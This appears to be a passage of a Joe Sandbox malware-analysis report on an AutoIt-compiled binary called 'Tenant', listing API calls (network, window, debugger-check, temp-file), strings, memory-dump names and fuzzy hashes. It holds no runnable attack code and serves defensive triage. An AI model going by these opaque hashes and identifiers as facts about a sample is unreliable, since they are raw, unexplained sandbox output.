                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                        • String ID: @
                                                                                        • API String ID: 2783356886-2766056989
                                                                                        • Opcode ID: c18cf3c7799c5543a2afe3fd2e5617aafcae2d9a385413f9f8f42a467199d7ba
                                                                                        • Instruction ID: 8b57b104b855f764aec4ea03bdfe2498c4f17a9eae005d241fe025a996d2680d
                                                                                        • Opcode Fuzzy Hash: c18cf3c7799c5543a2afe3fd2e5617aafcae2d9a385413f9f8f42a467199d7ba
                                                                                        • Instruction Fuzzy Hash: 9E515971408B449BE320AF50E885BAFBBE8FFC9314F51484DF1D8421A1DBB095298B26
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00B28186
                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B2819B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: '
                                                                                        • API String ID: 3850602802-1997036262
                                                                                        • Opcode ID: 30f09c3f2d9c86a2bbc093c06e75cfbdf98512025655a243ebebe14feae38e1e
                                                                                        • Instruction ID: bc478eba72e295a4277bbca8e57ddb9090b74762cce64083714891aa2cf80cae
                                                                                        • Opcode Fuzzy Hash: 30f09c3f2d9c86a2bbc093c06e75cfbdf98512025655a243ebebe14feae38e1e
                                                                                        • Instruction Fuzzy Hash: 81411974A012199FDB14CF68D881BDA7BF5FF09301F1041AAE908EB391DB71A956CF90
APIs
• _memset.LIBCMT ref: 00B12C6A
• InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00B12CA0
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: CrackInternet_memset
• String ID: |
• API String ID: 1413715105-2343686810
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 00B2713C
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B27178
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
APIs
• _memset.LIBCMT ref: 00B030B8
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B030F3
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
APIs
• __snwprintf.LIBCMT ref: 00B14132
  • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: __snwprintf_memmove
• String ID: , $$AUTOITCALLVARIABLE%d
• API String ID: 3506404897-2584243854
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B26D86
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B26D91
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
APIs
  • Part of subcall function 00AA2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AA214F
  • Part of subcall function 00AA2111: GetStockObject.GDI32(00000011), ref: 00AA2163
  • Part of subcall function 00AA2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA216D
• GetWindowRect.USER32(00000000,?), ref: 00B27296
• GetSysColor.USER32(00000012), ref: 00B272B0
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 00B26FC7
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B26FD6
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
APIs
• _memset.LIBCMT ref: 00B031C9
• GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00B031E8
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B128F8
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B12921
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
APIs
  • Part of subcall function 00B186E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00B1849D,?,00000000,?,?), ref: 00B186F7
• inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B184A0
• htons.WSOCK32(00000000,?,00000000), ref: 00B184DD
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
• Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: ByteCharMultiWidehtonsinet_addr
• String ID: 255.255.255.255
• API String ID: 2496851823-2422070025
                                                                                        • Opcode ID: dd0f8d15cc73a815cc966941d6904a0cd2fe32ffa00499b4cd8f3e5c6b19b801
                                                                                        • Instruction ID: ed6ca8f0ad0bf5892c40a672bd86124f1946a5cffe9efb26b6c0ba589a75cf83
                                                                                        • Opcode Fuzzy Hash: dd0f8d15cc73a815cc966941d6904a0cd2fe32ffa00499b4cd8f3e5c6b19b801
                                                                                        • Instruction Fuzzy Hash: 4C11827510020AABDB10AF64C846FEEB768FF14310F504566FA1557392DF71A854C655
                                                                                        APIs
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                          • Part of subcall function 00AFB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00AFB7BD
                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00AF9A2B
                                                                                        Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: 05910ea5f158c7e7bb49a4e1e071e22c5ed21503da44d192df95d8421ca41a2d
• Instruction ID: 0bb0ecf4f6a6e9c7b2a7520abf97aa403966138aa6805b91020a0fcab555b074
• Opcode Fuzzy Hash: 05910ea5f158c7e7bb49a4e1e071e22c5ed21503da44d192df95d8421ca41a2d
• Instruction Fuzzy Hash: 5601F571A52118AB8B14FBA4CD62DFF777DAF56360B500709F961532D2EE3158088660
APIs
Strings
Similarity
• API ID: __fread_nolock_memmove
• String ID: EA06
• API String ID: 1988441806-3962188686
• Opcode ID: c69047e33816223bfc9ed0e2d24490382e01cfa671d1796cb240298a8b803084
• Instruction ID: b9acfaea3bc9b0a7ab1b1591ad6d69339667a1460902f52001942ba25d715360
• Opcode Fuzzy Hash: c69047e33816223bfc9ed0e2d24490382e01cfa671d1796cb240298a8b803084
• Instruction Fuzzy Hash: 4C01B972D042587EDB28C6A8CC56FBEBBF8DB15301F00419EF552D21C2E575E6089B60
APIs
  • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
  • Part of subcall function 00AFB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00AFB7BD
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00AF9923
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: bd21c7951afaf863b44e359240b99284ed2533c24773f7bcb406314cb76b8792
• Instruction ID: 127d6b53532f9eed55ce2f48d4e5b20788a10fed7c20c4252ed296ac3555f2d5
• Opcode Fuzzy Hash: bd21c7951afaf863b44e359240b99284ed2533c24773f7bcb406314cb76b8792
• Instruction Fuzzy Hash: A801A771A5210C6BCB14FBE0DAA2FFF77BC9F15340F500159B94263292EA515E0C96B1
APIs
  • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
  • Part of subcall function 00AFB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00AFB7BD
• SendMessageW.USER32(?,00000182,?,00000000), ref: 00AF99A6
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: a4cfea566042c5dcded5b41f091a0e9b92f3c82672582f25df24cf73c3ecef68
• Instruction ID: adfc49893ed923383073821905999cc52895650bcb26c3b80e1b45314df81bb1
• Opcode Fuzzy Hash: a4cfea566042c5dcded5b41f091a0e9b92f3c82672582f25df24cf73c3ecef68
• Instruction Fuzzy Hash: 1001A772A4210C6BCB10EBE4CA92FFF77AC9F15340F500159B94573292DA555F089671
APIs
Strings
Similarity
• API ID: ClassName_wcscmp
• String ID: #32770
• API String ID: 2292705959-463685578
• Opcode ID: f2766608a16209fab32958e723b81bb7236c1a65b564cb71d2d2d4ec8e55bc68
• Instruction ID: 1c9b32601969b7bce695561a58a0e7796816fb852f711b4ad290ab11f57b3a5c
• Opcode Fuzzy Hash: f2766608a16209fab32958e723b81bb7236c1a65b564cb71d2d2d4ec8e55bc68
• Instruction Fuzzy Hash: 3DE0D17350022D57D720E659AC45FABFBECDB55771F010157FD04D7051D960D94587E0
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00AF88A0
  • Part of subcall function 00AC3588: _doexit.LIBCMT ref: 00AC3592
Strings
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
• Opcode ID: ccf761235c371540ccef1fa004fd1e05cfacde049dc68bf6d2c35694e8759d26
• Instruction ID: cf4465dfb53a98dffc1c92de7726fc4522916e3b7b1dfd823d9ff1f5de5f377b
• Opcode Fuzzy Hash: ccf761235c371540ccef1fa004fd1e05cfacde049dc68bf6d2c35694e8759d26
• Instruction Fuzzy Hash: D6D05B3238535C36D21533E56D1BFDA7B8C8F05B91F10446AFB08651D38DD5899041D5
APIs
  • Part of subcall function 00ADB544: _memset.LIBCMT ref: 00ADB551
  • Part of subcall function 00AC0B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00ADB520,?,?,?,00AA100A), ref: 00AC0B79
• IsDebuggerPresent.KERNEL32(?,?,?,00AA100A), ref: 00ADB524
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00AA100A), ref: 00ADB533
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00ADB52E
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 3158253471-631824599
• Opcode ID: 9db7bf81733b9868d1d52572916e3ec4be0f75f4dcffa5bc104f904459cda5eb
• Instruction ID: 0b90a9b835a9d21c43cbc060751286f98d01f9c559a8e88b7f689cc0a5b9b5aa
• Opcode Fuzzy Hash: 9db7bf81733b9868d1d52572916e3ec4be0f75f4dcffa5bc104f904459cda5eb
• Instruction Fuzzy Hash: 26E06D70250711CBD320AF29E905B46BAE4AF04704F15896EE447C3780DBB5D504CBA1
APIs
• GetSystemDirectoryW.KERNEL32(?), ref: 00AE0091
  • Part of subcall function 00B1C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,00AE027A,?), ref: 00B1C6E7
  • Part of subcall function 00B1C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00B1C6F9
• FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00AE0289
Strings
Similarity
• API ID: Library$AddressDirectoryFreeLoadProcSystem
• String ID: WIN_XPe
• API String ID: 582185067-3257408948
• Opcode ID: f6950c16ff367791692c8b612cec31a3601443a4bd1232f31307e490792c379e
• Instruction ID: a5ce2a9eeac27992d485de869eeb3a7703953775514a96fa39f69fdac118bcd3
• Opcode Fuzzy Hash: f6950c16ff367791692c8b612cec31a3601443a4bd1232f31307e490792c379e
• Instruction Fuzzy Hash: C2F0C971855149DFCB16DBA1C998BEDBBF8AF48300F640085E146B7190CBB54F84DF21
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 00B09EB5
• GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00B09ECC
Strings
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371
• Opcode ID: 4c2a1686b76ebc8818b7d8e5ca7d94b64af07ba016395f0388713fc626d109bb
• Instruction ID: 7e37e788a886b603d51d1a202329eec4fa0c54e573e2541815eebf151da1bc12
• Opcode Fuzzy Hash: 4c2a1686b76ebc8818b7d8e5ca7d94b64af07ba016395f0388713fc626d109bb
• Instruction Fuzzy Hash: C1D05E7558030DABDB60AB90DC0EFDFBB6CDF04701F1042E1BE58921A2DE7055988B91